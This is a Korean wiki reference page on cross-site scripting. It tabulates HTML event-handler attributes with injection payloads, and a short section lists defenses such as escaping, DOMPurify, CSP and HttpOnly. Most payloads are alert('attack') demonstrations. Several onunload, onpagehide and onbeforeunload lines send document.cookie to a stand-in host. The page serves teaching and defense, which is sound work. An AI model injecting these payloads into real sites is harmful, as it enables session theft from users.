사이드바
기술문서:레퍼런스:보안:xss
문서의 이전 판입니다!
XSS
XSS (Cross Site Scripting) 공격과 방어
공격
HTML Event Attributes
| 속성 | 예시 | 비고 |
|---|---|---|
| onabort | - | 강제 중단/취소 |
| onactivate 1) 2) | - | |
| onafterprint 3) | <body onafterprint="alert('attack')"> </body> <frameset onafterprint="alert('attack')"> </frameset> | 인쇄 후 - 인쇄 - 취소 |
| onafterscriptexecute 4) 5) | - | |
| onafterupdate 6) | - | |
| onanimationcancel 7) | - | 강제 중단/취소 |
| onanimationend 8) | <span onanimationend="alert('attack')" style="animation:progress-bar-stripes 1s"> </span> | 애니메이션 종료 - 자동 실행 9) |
| onanimationiteration 10) | <span onanimationiteration="alert('attack')" style="animation:progress-bar-stripes 1s infinite"> </span> | 애니메이션 반복 - 자동 실행 11) |
| onanimationstart 12) | <span onanimationstart="alert('attack')" style="animation:progress-bar-stripes 1s"> </span> | 애니메이션 시작 - 자동 실행 13) |
| onappinstalled 14) 15) | <body onappinstalled="alert('attack')"> </body> | PWA 설치 성공 시 |
| onauxclick 16) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onauxclick="alert('attack')"> | (영역 내) 떼는 순간 - 좌클릭 이외 |
| onbeforeactivate 17) 18) | - | |
| onbeforecopy 19) | <span onbeforecopy="alert('attack')"> Ctrl + C </span> | 복사 시작 시 |
| onbeforecut 20) | <span onbeforecut="alert('attack')"> Ctrl + X </span> | 잘라내기 시작 시 |
| onbeforedeactivate 21) 22) | - | |
| onbeforeeditfocus 23) 24) | - | |
| onbeforeinput | <input onbeforeinput="alert('attack')"> | 입력 직전 |
| onbeforeinstallprompt 25) 26) | <body onbeforeinstallprompt="alert('attack')"> </body> | PWA 설치 가능 시 |
| onbeforematch | - | |
| onbeforepaste 27) | - | 붙여넣기 시작 시 |
| onbeforeprint 28) | <body onbeforeprint="alert('attack')"> </body> <frameset onbeforeprint="alert('attack')"> </frameset> | 인쇄 전 |
| onbeforescriptexecute 29) 30) | - | |
| onbeforetoggle 31) | - | |
| onbeforeunload 32) | <body onbeforeunload="navigator.sendBeacon ('https://example.com', document.cookie)"> </body> <frameset onbeforeunload="navigator.sendBeacon ('https://example.com', document.cookie)"> </frameset> | 페이지 이탈 시 |
| onbeforeupdate 33) | - | |
| onbegin 34) | <svg width="0" height="0"> <animate onbegin="alert('attack')"> </svg> | 애니메이션 시작 - 자동 실행 |
| onblur 35) | <input onblur="alert('attack')"> | 포커스 이탈 시 |
| onbounce 36) 37) | - | |
| oncancel 38) | - | |
| oncanplay 39) 40) |  | |
| oncanplaythrough 41) 42) | | |
| oncellchange 43) | - | |
| onchange 44) | <input onchange="alert('attack')"> | 1) 값 변경 2) 포커스 이탈 시 |
| onchargingchange 45) | - | |
| onclick 46) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onclick="alert('attack')"> <button type="button" onclick="alert('attack')"> Enter 또는 Space </button> | (영역 내) 클릭 Enter 또는 Space |
| onclose 47) | - | |
| oncontentvisibilityautostatechange | <span oncontentvisibilityautostatechange="alert('attack')" style="content-visibility:auto"> </span> | content-visibility:auto - 자동 실행 |
| oncontextlost 48) | - | |
| oncontextmenu 49) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" oncontextmenu="alert('attack')"> <button type="button" oncontextmenu="alert('attack')"> Shift + F10 </button> | (영역 내) 우클릭 Shift + F10 |
| oncontextrestored 50) | - | |
| oncontrolselect 51) | - | |
| oncopy 52) | <span oncopy="alert('attack')"> Ctrl + C </span> | 복사 실행 시 |
| oncuechange 53) | - | |
| oncut 54) | <span oncut="alert('attack')"> Ctrl + X </span> | 잘라내기 실행 시 |
| ondeactivate 55) 56) | - | |
| ondblclick 57) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" ondblclick="alert('attack')"> | (영역 내) 더블클릭 |
| ondevicechange 58) | - | |
| ondevicemotion 59) | - | |
| ondeviceorientation 60) | - | |
| ondeviceorientationabsolute 61) | - | |
| ondrag 62) | - | |
| ondragend 63) | - | |
| ondragenter 64) | - | |
| ondragleave 65) | - | |
| ondragover 66) | - | |
| ondragstart 67) | - | |
| ondrop 68) | - | |
| ondurationchange 69) 70) | | |
| onend 71) | <svg width="0" height="0"> <animate onend="alert('attack')" dur="1s"> </svg> | 애니메이션 종료 - 자동 실행 |
| onended 72) 73) | | |
| onerror | <img src="" onerror="alert('attack')"> | 로드 실패 - 자동 실행 |
| onerrorupdate 74) | - | |
| onfilterchange 75) | - | |
| onfinish 76) 77) | - | |
| onfocus 78) | <input onfocus="alert('attack')"> | 포커스 진입 시 |
| onfocusin 79) | <input onfocusin="alert('attack')"> | 포커스 진입 시 |
| onfocusout 80) | <input onfocusout="alert('attack')"> | 포커스 이탈 시 |
| onformchange | - | 1) 값 변경 2) 포커스 이탈 시 |
| onformdata 81) | - | |
| onforminput | - | 입력 직후 |
| onfreeze 82) | - | |
| onfscommand 83) 84) | - | |
| onfullscreenchange | - | 전체 화면 변경 |
| onfullscreenerror | - | 전체 화면 오류 |
| ongamepadconnected 85) | - | |
| ongamepaddisconnected 86) | - | |
| ongotpointercapture 87) | - | 제어권 획득 |
| onhashchange | - | 해시(#) 변경 시 |
| onhelp 88) | - | |
| oninput | <input oninput="alert('attack')"> | 입력 직후 |
| oninvalid 89) | <form> <input required oninvalid="alert('attack')"> </form> | 유효성 |
| onkeydown 90) | <input onkeydown="alert('attack')"> | (키) 누르는 순간 |
| onkeypress 91) | - | |
| onkeyup 92) | <input onkeyup="alert('attack')"> | (키) 떼는 순간 |
| onlanguagechange 93) 94) | <body onlanguagechange="alert('attack')"> </body> | 브라우저 설정 - 언어 추가/삭제/이동 - 이 언어로 표시 |
| onlayoutcomplete 95) | - | |
| onlevelchange 96) | - | |
| onload | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onload="alert('attack')"> | 로드 완료 - 자동 실행 |
| onloadeddata 97) 98) | | |
| onloadedmetadata 99) 100) | | |
| onloadstart 101) 102) | <video src="https://wiki.jobdeveloper.co.kr/logo.mp4" width="0" height="0" onloadstart="alert('attack')"> | 미디어 로딩 시작 - 자동 실행 |
| onlostpointercapture 103) | - | 제어권 상실 |
| onmessage 104) | - | |
| onmessageerror 105) | - | |
| onmousedown 106) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmousedown="alert('attack')"> | (영역 내) 누르는 순간 |
| onmouseenter 107) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmouseenter="alert('attack')"> | (영역 내) 진입 시 |
| onmouseleave 108) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmouseleave="alert('attack')"> | (영역 내) 이탈 시 |
| onmousemove 109) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmousemove="alert('attack')"> | (영역 내) 이동 시 |
| onmouseout 110) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmouseout="alert('attack')"> | (영역 내) 이탈 시 |
| onmouseover 111) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmouseover="alert('attack')"> | (영역 내) 진입 시 |
| onmouseup 112) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmouseup="alert('attack')"> | (영역 내) 떼는 순간 |
| onmousewheel 113) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onmousewheel="alert('attack')"> | (영역 내) 휠 스크롤 |
| onmove 114) | - | |
| onmoveend 115) | - | |
| onmovestart 116) | - | |
| onmozfullscreenchange 117) | - | 전체 화면 변경 |
| onmozfullscreenerror 118) | - | 전체 화면 오류 |
| onoffline 119) | - | 온라인 → 오프라인 |
| ononline 120) | - | 오프라인 → 온라인 |
| onorientationchange 121) | <body onorientationchange="alert('attack')"> </body> | 화면 회전 |
| onpagehide 122) | <body onpagehide="navigator.sendBeacon ('https://example.com', document.cookie)"> </body> <frameset onpagehide="navigator.sendBeacon ('https://example.com', document.cookie)"> </frameset> | 페이지 이탈 시 |
| onpageshow 123) | <body onpageshow="alert('attack')"> </body> <frameset onpageshow="alert('attack')"> </frameset> | 페이지 진입 시 |
| onpaste 124) | <span onpaste="alert('attack')"> Ctrl + V </span> | 붙여넣기 실행 시 |
| onpause 125) 126) | | |
| onplay 127) 128) | | |
| onplaying 129) 130) | | |
| onpointercancel 131) | - | 강제 중단/취소 |
| onpointerdown 132) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerdown="alert('attack')"> | (영역 내) 누르는 순간 |
| onpointerenter 133) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerenter="alert('attack')"> | (영역 내) 진입 시 |
| onpointerleave 134) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerleave="alert('attack')"> | (영역 내) 이탈 시 |
| onpointermove 135) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointermove="alert('attack')"> | (영역 내) 이동 시 |
| onpointerout 136) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerout="alert('attack')"> | (영역 내) 이탈 시 |
| onpointerover 137) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerover="alert('attack')"> | (영역 내) 진입 시 |
| onpointerrawupdate 138) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerrawupdate="alert('attack')"> | (영역 내) 이동 시 |
| onpointerup 139) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onpointerup="alert('attack')"> | (영역 내) 떼는 순간 |
| onpopstate | - | 뒤로가기 |
| onpresentationconnectionavailable 140) | - | |
| onprogress 141) 142) | | |
| onpropertychange 143) | - | |
| onratechange 144) 145) | | |
| onreadystatechange 146) | - | |
| onrejectionhandled 147) | - | |
| onrepeat 148) | <svg width="0" height="0"> <animate onrepeat="alert('attack')" dur="1s" repeatCount="2"> </svg> <svg width="0" height="0"> <animate onrepeat="alert('attack')" dur="1s" repeatCount="indefinite"> </svg> | 애니메이션 반복 - 자동 실행 |
| onreset 149) | - | |
| onresize 150) | <body onresize="alert('attack')"> </body> <frameset onresize="alert('attack')"> </frameset> <svg width="0" height="0" onresize="alert('attack')"> </svg> | 창 크기 변경 |
| onresume 151) | - | |
| onrowenter 152) | - | |
| onrowexit 153) | - | |
| onrowsdelete 154) | - | |
| onrowsinserted 155) | - | |
| onscroll | - | 스크롤 시 |
| onscrollend | - | 스크롤 정지 시 |
| onscrollsnapchange | <div style="scroll-snap-type:y mandatory; overflow:scroll; height:1px" onscrollsnapchange="alert('attack')"> <div style="scroll-snap-align:start; height:1px"> </div> <div style="scroll-snap-align:start; height:1px"> </div> </div> | 스냅 대상 변경 완료 - 자동 실행 |
| onscrollsnapchanging | - | 스냅 대상 변경 중 |
| onsearch 156) | <input type="search" onsearch="alert('attack')"> | Enter 또는 x |
| onsecuritypolicyviolation | - | |
| onseeked 157) 158) | | |
| onseeking 159) 160) | | |
| onselect 161) | <input onselect="alert('attack')"> | 텍스트 선택 시 |
| onselectionchange | - | |
| onselectstart | <span onselectstart ="alert('attack')"> 텍스트 </span> | 드래그 시작 시 |
| onshow 162) | - | |
| onslotchange | - | |
| onstalled 163) 164) | | |
| onstart 165) 166) | - | |
| onstop 167) | - | |
| onstorage 168) | - | |
| onsubmit 169) | - | |
| onsuspend 170) 171) | | |
| ontimeupdate 172) 173) | | |
| ontoggle 174) | - | |
| ontouchcancel 175) | - | 강제 중단/취소 |
| ontouchend 176) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" ontouchend="alert('attack')"> | (영역 내) 떼는 순간 |
| ontouchmove 177) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" ontouchmove="alert('attack')"> | (영역 내) 이동 시 |
| ontouchstart 178) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" ontouchstart="alert('attack')"> | (영역 내) 누르는 순간 |
| ontransitioncancel 179) | - | |
| ontransitionend 180) | - | |
| ontransitionrun 181) | - | |
| ontransitionstart 182) | - | |
| onunhandledrejection 183) | - | |
| onunload 184) | <body onunload="navigator.sendBeacon ('https://example.com', document.cookie)"> </body> <frameset onunload="navigator.sendBeacon ('https://example.com', document.cookie)"> </frameset> | 페이지 이탈 시 |
| onvisibilitychange | - | |
| onvolumechange 185) 186) | | |
| onvrdisplayactivate 187) | - | |
| onvrdisplaydeactivate 188) | - | |
| onwaiting 189) 190) | | |
| onwebkitanimationcancel 191) | - | |
| onwebkitanimationend 192) | - | |
| onwebkitanimationiteration 193) | - | |
| onwebkitanimationstart 194) | - | |
| onwebkitcurrentplaybacktargetisitemcontainerchange 195) | - | |
| onwebkitfullscreenchange 196) | - | 전체 화면 변경 |
| onwebkitfullscreenerror 197) | - | 전체 화면 오류 |
| onwebkitmouseforcechanged 198) | - | |
| onwebkitmouseforcedown 199) | - | |
| onwebkitmouseforceup 200) | - | |
| onwebkitmouseforcewillbegin 201) | - | |
| onwebkittransitioncancel 202) | - | |
| onwebkittransitionend 203) | - | |
| onwebkittransitionrun 204) | - | |
| onwebkittransitionstart 205) | - | |
| onwebkitwillrevealbottom 206) | - | |
| onwheel 207) | <img src="https://wiki.jobdeveloper.co.kr/logo.png" onwheel="alert('attack')"> | (영역 내) 휠 스크롤 |
| onzoom 208) | - |
방어
- HTML 태그 무력화
- & → &
- < → <
- > → >
- " → "
- ' → '
- DOMPurify 사용
- CSP 설정
- HttpOnly 설정
1)
, 17)
, 21)
, 36)
, 55)
, 76)
, 114)
, 115)
, 116)
, 143)
, 165)
, 167)
Internet Explorer / Edge Legacy
6)
, 23)
, 33)
, 43)
, 51)
, 74)
, 75)
, 83)
, 88)
, 95)
, 152)
, 153)
, 154)
, 155)
, 208)
Internet Explorer
39)
, 41)
, 69)
, 72)
, 97)
, 99)
, 101)
, 125)
, 127)
, 129)
, 141)
, 144)
, 157)
, 159)
, 163)
, 170)
, 172)
, 185)
, 189)
미디어
40)
, 42)
, 70)
, 73)
, 98)
, 100)
, 102)
, 126)
, 128)
, 130)
, 142)
, 145)
, 158)
, 160)
, 164)
, 171)
, 173)
, 186)
, 190)
<audio>, <video>
53)
<track>
84)
플래시
93)
시스템
150)
<body>, <frameset>, <svg>
156)
<input type="search">
161)
<input>, <textarea>
162)
Firefox